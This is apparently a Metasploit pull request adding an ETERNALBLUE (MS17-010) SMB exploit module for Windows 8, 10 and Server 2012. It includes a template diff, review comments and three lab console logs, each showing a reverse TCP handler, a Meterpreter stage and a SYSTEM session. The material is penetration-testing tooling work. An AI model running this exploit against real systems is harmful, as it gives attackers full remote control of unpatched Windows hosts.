### PR TITLE
Add sleepya's ETERNALBLUE exploit for Win8+ as an external module

### PR DESCRIPTION
**Pull request by wvu**
# ~WIP~ :beers:

This is a **stopgap** until we understand ETERNALBLUE well enough to add our own targets.

Tested on **Windows 10 Enterprise Evaluation Build 10586 x64**.

- [x] Test Windows 8
- [x] Test Windows 10
- [x] Test 2012
- [ ] Replace this with original work

```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows 10 Enterprise Evaluation 10586
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49671) at 2018-06-18 12:40:44 -0500

meterpreter > getuid
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
```

Don't mind the first `getuid`, since I was impatient before `stdapi` was loaded.

### CODE REVIEW

**Comment by wvu-r7** [comment]
Jenkins, test this, please.

File: lib/msf/core/modules/external/templates/remote_exploit.erb [hunk 1]
```diff
@@ -0,0 +1,43 @@
+require 'msf/core/modules/external/bridge'
+require 'msf/core/module/external'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = <%= meta[:rank] %>
```
Comment (acammack-r7) [inline lib/msf/core/modules/external/templates/remote_exploit.erb]: I think we can pull this into a shared template that looks something like:
```erb
Rank = <%= meta[:rank].capitalize %>Ranking
```

Comment (wvu-r7) [reply lib/msf/core/modules/external/templates/remote_exploit.erb]: Generally only exploits and encoders use rank, but it's available to all modules. Shared template is fine. I like this change!

Comment (wvu-r7) [reply lib/msf/core/modules/external/templates/remote_exploit.erb]: I've decided to move the logic into the shim and keep it for exploits right now. Let me know what you think!

**Comment by wvu-r7** [comment]
Windows 8.1 tested:

```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows 8.1 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:49159) at 2018-06-19 16:29:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : LIVINGROOM-PC
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```

**Comment by wvu-r7** [comment]
Windows Server 2012 R2 tested:

```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows Server 2012 R2 Standard Evaluation 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2018-06-19 17:31:35 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-DEEAVK8VA6A
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```

**Comment by busterb** [comment]
## Release Notes

This adds sleepya's ms17_010_eternalblue exploit variant for Windows 8, Windows 10, and Windows 2012 as an external module.

**Comment by OJ** [comment]
Great work folks 👍

**Comment by wvu-r7** [comment]
🙇

I'll have a second round of improvements later. Thanks!

**Pull request merged**